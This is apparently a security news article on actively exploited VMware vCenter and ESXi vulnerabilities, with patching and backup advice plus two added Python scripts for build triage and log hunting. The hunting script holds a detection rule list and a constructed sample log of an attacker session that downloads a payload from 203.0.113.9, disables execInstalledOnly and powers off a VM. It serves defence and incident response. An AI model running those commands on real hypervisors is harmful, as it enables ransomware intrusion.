VMware vCenter and ESXi Under Active Attack: The 2026 Patch Priority
CISA confirms exploited flaws in VMware vCenter and ESXi, with ransomware crews chaining ESXi bugs to encrypt entire virtual estates.

VMware's virtualization stack runs an enormous share of the world's server workloads, which makes its vulnerabilities a high-value target. In early 2026, CISA confirmed active exploitation across both vCenter Server and ESXi, including ESXi flaws now used in ransomware campaigns to encrypt entire virtual estates at once. For anyone running a VMware environment, these belong at the top of the patch queue, ahead of routine maintenance.
Quick answer
CISA confirmed active exploitation across both vCenter and ESXi in early 2026. The vCenter flaw CVE-2024-37079 is a pre-auth remote code execution bug; the ESXi flaw CVE-2025-22225 is now used in ransomware to encrypt whole virtual estates at once. Inventory every vCenter and ESXi build number against Broadcom's advisories (version family is not enough), patch the KEV-listed CVEs first, get management interfaces off the internet, and keep at least one immutable offline backup a compromised host cannot reach.
Key takeaways
- CISA added a critical vCenter Server flaw (CVE-2024-37079, a heap overflow, an out-of-bounds write, in the DCERPC protocol implementation, fixed by Broadcom in VMSA-2024-0012) to its Known Exploited Vulnerabilities catalog; it allows unauthenticated remote code execution from a crafted network packet.
- CVE-2025-22225, an arbitrary-write flaw in ESXi, is confirmed in active ransomware use, with CISA updating its KEV entry to reflect that.
- The three ESXi bugs (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226), patched together in Broadcom's VMSA-2025-0004 in March 2025, form a VM-escape chain: an attacker who already has administrative control inside a guest VM uses them to break out to the hypervisor. They have reportedly been chained in zero-day attacks since at least early 2024.
- Federal agencies faced KEV remediation deadlines (vCenter by February 13, 2026 under BOD 22-01); private organizations should treat those as urgent guidance.
- A compromised hypervisor is catastrophic: encrypting ESXi can take down every virtual machine on a host simultaneously, so backup isolation matters as much as patching.
Why hypervisor bugs are a worst case
A vulnerability in vCenter or ESXi is not like a flaw in one application. vCenter manages your whole virtual fleet, and ESXi is the platform every VM runs on. Compromise either and an attacker can reach across many workloads at once. Ransomware groups have figured this out: rather than encrypting machines one by one, they target ESXi directly and encrypt all the virtual disks on a host in a single stroke. That is why the confirmed ransomware use of CVE-2025-22225 is so alarming.
The vCenter flaw, CVE-2024-37079, is a heap overflow (an out-of-bounds write) in the DCERPC protocol implementation. An attacker with network access to the vCenter service can send specially crafted packets to achieve remote code execution without authenticating first, exactly the kind of pre-auth RCE that gets weaponized fast. The ESXi chain works from the other direction: CVE-2025-22224 and CVE-2025-22226 are reachable by an attacker with administrative privileges inside a guest VM, and CVE-2025-22225 turns the resulting control of the VMX process into an arbitrary kernel write on the host. That means a single compromised workload, a tenant VM, a jump box, or any guest an intruder already runs code on, is enough of a foothold; the hypervisor does not need to be exposed on the network for the chain to work.

What CISA and Broadcom have confirmed
Warning
CISA's Known Exploited Vulnerabilities catalog is the authoritative signal here. When a VMware CVE lands in KEV, it means real-world exploitation has been observed, not theoretical risk. Patch those first.
- vCenter, CVE-2024-37079: added to KEV with a February 13, 2026 federal remediation deadline under Binding Operational Directive 22-01. Broadcom warned of in-the-wild exploitation.
- ESXi, CVE-2025-22225: arbitrary-write flaw, added to KEV when Broadcom disclosed it in March 2025; CISA updated the entry in early February 2026 to record ransomware exploitation.
- ESXi chain, CVE-2025-22224 / 22225 / 22226: disclosed and patched by Broadcom in VMSA-2025-0004 in March 2025 and added to KEV at the same time; reportedly chained in targeted zero-day attacks since early 2024.
Always confirm the exact affected builds against Broadcom's VMware security advisories for your version, because fixed builds differ across ESXi, vCenter, Workstation, and Fusion.
For a fast triage, here are the flaws that matter most and where they sit:
| CVE | Component | Type | Status |
|---|---|---|---|
| CVE-2024-37079 | vCenter Server | Heap overflow (out-of-bounds write) in DCERPC, pre-auth RCE | KEV, federal deadline Feb 13, 2026 |
| CVE-2025-22225 | ESXi | Arbitrary kernel write from the VMX process | KEV since Mar 2025, confirmed ransomware use |
| CVE-2025-22224 | ESXi | Heap overflow in VMCI, guest admin to VMX code execution | KEV since Mar 2025, chained in attacks |
| CVE-2025-22226 | ESXi | Information disclosure (out-of-bounds read) in HGFS | KEV since Mar 2025, chained in attacks |
Patch top to bottom: the two KEV-listed entries with confirmed exploitation come first, then verify the March 2025 ESXi chain is actually applied on every host.
What to do now
- Inventory and match versions. List your vCenter and ESXi builds and check each against the relevant Broadcom advisory to confirm whether it is vulnerable.
- Patch the KEV items first. Prioritize CVE-2024-37079 (vCenter), CVE-2025-22225 (ESXi) and the rest of the ESXi chain; these have confirmed exploitation.
- Reduce management exposure. vCenter and ESXi management interfaces should never face the public internet. Put them behind a segmented management network and restrict access tightly.
- Protect backups from the hypervisor. Keep at least one immutable, offline copy that a compromised ESXi host cannot reach or encrypt; that is the approach in our 3-2-1-1-0 backup guide. Backups that live on datastores the host mounts, or on a repository the host's credentials can write to, are in scope for the same encryption run.
- Hunt for compromise. Review ESXi shell access, unexpected processes, and vCenter authentication logs for activity predating your patch.
Edge-to-hypervisor is a common ransomware path: an exploited VPN or firewall gives initial access, then attackers pivot to ESXi for maximum impact. Pair this with hardening on your perimeter devices, such as the steps in our coverage of the SonicWall SSL VPN mass exploitation.
Why "patched in 2025" is not the same as "safe"
A surprising number of breached environments had the right patch available and even believed it was applied. Two gaps explain most of those cases. First, version family is not build number: an ESXi host can sit in a "patched" major version while running a build that predates the fix, because someone updated the cluster unevenly or rolled one host back. Second, lateral compromise that happened before patching does not undo itself; if an attacker reached the ESXi shell while you were vulnerable, the fix closes the hole but leaves whatever they planted behind.
That is why the response has to be inventory-first and assume-breach. Confirm the exact build on every single host against the Broadcom advisory, not a representative sample, and then go looking for signs someone already had access rather than assuming the patch ended the story.
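The build-matching step above is easy to get wrong by hand, so here is an added example (not code from the original article or from Broadcom) that triages an inventory the way the paragraph describes: every host is classified by its exact update line and build, a host on a line the table does not cover is reported as unknown rather than passed, and the fixed-build table is keyed by update line rather than major version because 8.0 U2 and 8.0 U3 receive separate fixed builds whose numbers are not comparable across lines. The CSV layout, host names and every build number below are constructed placeholders; the real fixed builds must be copied from the Broadcom advisory for each CVE (VMSA-2025-0004 for the ESXi chain, VMSA-2024-0012 for CVE-2024-37079).

```python
"""Added example: classify an ESXi/vCenter build inventory as fixed, vulnerable
or unknown, keyed by exact update line. Not from the original article.

Assumptions (all constructed for illustration):
  - the inventory is a CSV with columns name,product,line,build, like one you
    could export from PowerCLI or collect from `esxcli system version get`;
  - FIXED_BUILDS holds PLACEHOLDER numbers, not real fixed builds. Replace them
    with the fixed build per update line from the Broadcom advisory.
"""
import csv
import io
from dataclasses import dataclass

# (product, update line) -> first build carrying the fix. PLACEHOLDER values.
# Keyed by update line, not by major version: the 8.0 U2 and 8.0 U3 lines get
# separate fixed builds, and a build number on one line says nothing about the other.
FIXED_BUILDS: dict[tuple[str, str], int] = {
    ("ESXi", "8.0 U3"): 24500300,
    ("ESXi", "8.0 U2"): 24500200,
    ("ESXi", "7.0 U3"): 24500100,
    ("vCenter", "8.0 U3"): 24400300,
    ("vCenter", "7.0 U3"): 24400100,
}


@dataclass
class Host:
    name: str
    product: str   # "ESXi" or "vCenter"
    line: str      # update line, e.g. "8.0 U3"
    build: int


def parse_inventory(text: str) -> list[Host]:
    """Read the constructed CSV layout into Host records."""
    rows = csv.DictReader(io.StringIO(text))
    return [Host(r["name"], r["product"], r["line"], int(r["build"])) for r in rows]


def classify(host: Host) -> str:
    """'fixed' only if the host's own line has a known fixed build and the host
    is at or past it. A line missing from the table is 'unknown', which the
    caller must treat as vulnerable until the advisory has been checked."""
    fixed = FIXED_BUILDS.get((host.product, host.line))
    if fixed is None:
        return "unknown"
    return "fixed" if host.build >= fixed else "vulnerable"


def triage(text: str) -> dict[str, list[str]]:
    """Group host names by status so the vulnerable and unknown lists drive the patch queue."""
    out: dict[str, list[str]] = {"fixed": [], "vulnerable": [], "unknown": []}
    for host in parse_inventory(text):
        out[classify(host)].append(host.name)
    return out


# Constructed sample: a cluster updated unevenly (esx02 one build behind the fix),
# a host on a different update line whose lower build number is still fixed (esx03),
# and a host on a line the table does not cover (esx04).
SAMPLE_INVENTORY = """name,product,line,build
esx01,ESXi,8.0 U3,24500300
esx02,ESXi,8.0 U3,24500299
esx03,ESXi,8.0 U2,24500250
esx04,ESXi,7.0 U2,24500150
vc01,vCenter,8.0 U3,24400300
"""

if __name__ == "__main__":
    for status, names in triage(SAMPLE_INVENTORY).items():
        print(f"{status:10s} {', '.join(names) or '-'}")
```

Run it and esx02 shows up as vulnerable even though it sits in the same 8.0 U3 family as the fixed esx01, esx03 is fixed despite carrying a lower build number than esx02, and esx04 lands in the unknown bucket instead of silently passing; those three outcomes are exactly the cases a family-level check misses.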
What to do tonight
If you run any VMware estate, do not let this wait for the next change window:
- Export a list of every ESXi and vCenter build number and compare each against the specific Broadcom advisory, not the version family.
- Patch the KEV-listed CVEs first: CVE-2024-37079 on vCenter and CVE-2025-22225 on ESXi, plus the March 2025 ESXi chain.
- Get every management interface off the public internet and behind a segmented, access-controlled network.
- Confirm you hold at least one immutable, offline backup copy a compromised ESXi host cannot reach or encrypt.
- Review ESXi shell access, unexpected processes, and vCenter authentication logs for activity that predates your patch, and treat any finding as an incident.
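For the last step, here is an added example (not from the original article) of the kind of review it calls for: a scan over ESXi auth.log and shell.log lines that flags interactive SSH logins from outside the management network and shell commands matching common hypervisor-ransomware tradecraft, and marks each hit as pre- or post-patch against the time you applied the fix. The log lines, the management subnet, the patch timestamp and the rule list are all constructed for illustration; the rule list is a starting point to extend from your own environment, not a complete signature set.

```python
"""Added example: hunt for pre-patch shell and SSH activity on an ESXi host.
Not from the original article; log lines, rules and addresses are constructed.

Line shape assumed for both auth.log and shell.log (constructed to resemble
ESXi syslog output):  <ISO-8601 timestamp> <process>[<pid>]: <message>
"""
import ipaddress
import re
from datetime import datetime, timezone

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<proc>[a-z]+)\[\d+\]: (?P<msg>.*)$")
SSH_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+")

# Shell commands that rarely belong in an unplanned session on a hypervisor.
# Constructed starting set; extend with what is normal (and abnormal) for your estate.
SHELL_RULES = [
    (r"esxcli vm process kill", "VM kill from shell"),
    (r"vim-cmd vmsvc/power\.off", "VM power-off from shell"),
    (r"vim-cmd hostsvc/enable_ssh", "SSH enabled from shell"),
    (r"execInstalledOnly", "execInstalledOnly changed"),
    (r"\b(wget|curl)\b.*https?://", "download from shell"),
    (r"chmod \+x", "file made executable"),
    (r"\bvmkfstools\b", "vmkfstools invoked"),
]


def parse_ts(value: str) -> datetime:
    """ISO-8601 with a trailing Z, returned as an aware UTC datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def hunt(lines, patched_at: datetime, mgmt_nets) -> list[dict]:
    """Return one finding per suspicious line, oldest first, with a pre_patch flag."""
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, proc, msg = parse_ts(m["ts"]), m["proc"], m["msg"]
        reason = None
        if proc == "sshd":
            s = SSH_RE.search(msg)
            if s and not any(ipaddress.ip_address(s["ip"]) in n for n in nets):
                reason = f"SSH login for {s['user']} from non-management address {s['ip']}"
        elif proc == "shell":
            for pattern, label in SHELL_RULES:
                if re.search(pattern, msg):
                    reason = label
                    break
        if reason:
            findings.append({"ts": ts, "pre_patch": ts < patched_at, "reason": reason, "line": line})
    return sorted(findings, key=lambda f: f["ts"])


# Constructed inputs: the patch went on 2026-02-03, the management subnet is
# 10.10.1.0/24, and the log shows one session two days earlier from outside it.
PATCHED_AT = datetime(2026, 2, 3, tzinfo=timezone.utc)
MGMT_NETS = ["10.10.1.0/24"]
SAMPLE_LOG = """2026-02-01T02:14:07Z sshd[2100400]: Accepted keyboard-interactive/pam for root from 203.0.113.9 port 51234 ssh2
2026-02-01T02:15:30Z shell[2100431]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 0
2026-02-01T02:16:02Z shell[2100431]: [root]: wget http://203.0.113.9/payload -O /tmp/payload
2026-02-01T02:16:10Z shell[2100431]: [root]: chmod +x /tmp/payload
2026-02-01T02:16:40Z shell[2100431]: [root]: esxcli vm process list
2026-02-01T02:17:05Z shell[2100431]: [root]: vim-cmd vmsvc/power.off 12
2026-02-04T09:00:00Z sshd[2100900]: Accepted publickey for root from 10.10.1.5 port 40022 ssh2
2026-02-04T09:02:11Z shell[2100950]: [root]: esxcli software vib list
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines(), PATCHED_AT, MGMT_NETS):
        tag = "PRE-PATCH " if f["pre_patch"] else "post-patch"
        print(f"{tag} {f['ts'].isoformat()} {f['reason']}")
```

On the sample, the five findings all predate the patch and come from one session: a login from 203.0.113.9, execInstalledOnly disabled, a download, the file made executable, then a VM power-off. That sequence is an incident regardless of whether the host has since been patched, which is the point of the article's last step; the post-patch admin session from inside the management subnet produces nothing.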
Frequently asked questions
I patched ESXi in 2025. Am I covered for the 2026 ransomware activity?
The March 2025 Broadcom patches fixed CVE-2025-22224/22225/22226. If you applied them and confirmed the fixed build, you closed those flaws. The 2026 news is that exploitation of CVE-2025-22225 expanded into ransomware, a reason to verify you actually patched, not a new bug for already-patched hosts.
Can these flaws be exploited from the internet directly?
vCenter's CVE-2024-37079 requires network access to the vCenter service. If your management plane is internet-exposed, the risk is severe; if it is properly segmented, the attacker must first gain internal access. The ESXi chain is different: it starts from administrative privileges inside a guest VM and escapes to the host, so it does not need the hypervisor's management interface to be reachable at all, only a guest the attacker already controls. Either way, patch, but exposure dramatically raises urgency.
Why is ESXi such a popular ransomware target?
Encrypting an ESXi host can lock every virtual machine running on it at once, maximizing damage from a single action. That efficiency is exactly why ransomware crews invest in hypervisor exploits.
How do I know if my build is fixed?
Compare your exact ESXi or vCenter build number against the fixed builds listed in the specific Broadcom VMware security advisory for that CVE, matching on the same update line (8.0 U2 and 8.0 U3 have different fixed builds). Version family alone is not enough; the build number is what matters.
The bottom line
VMware's vCenter and ESXi are under confirmed active attack in 2026, and the ESXi flaws are already feeding ransomware that can encrypt an entire virtual estate in one move. Inventory your builds, patch the KEV-listed CVEs first, get management interfaces off the internet, and keep an immutable backup copy the hypervisor cannot touch.
Sources & further reading
- cisa.gov/known-exploited-vulnerabilities-catalog
- bleepingcomputer.com/news/security/cisa-vmware-esxi-flaw-now-exploited-in-ransomware-attacks/
- helpnetsecurity.com/2026/02/05/cisa-cve-2025-22225-ransomware-exploitation/
- theregister.com/2026/01/23/critical_vmware_vcenter_server_bug/
- broadcom.com/support/vmware-security-advisories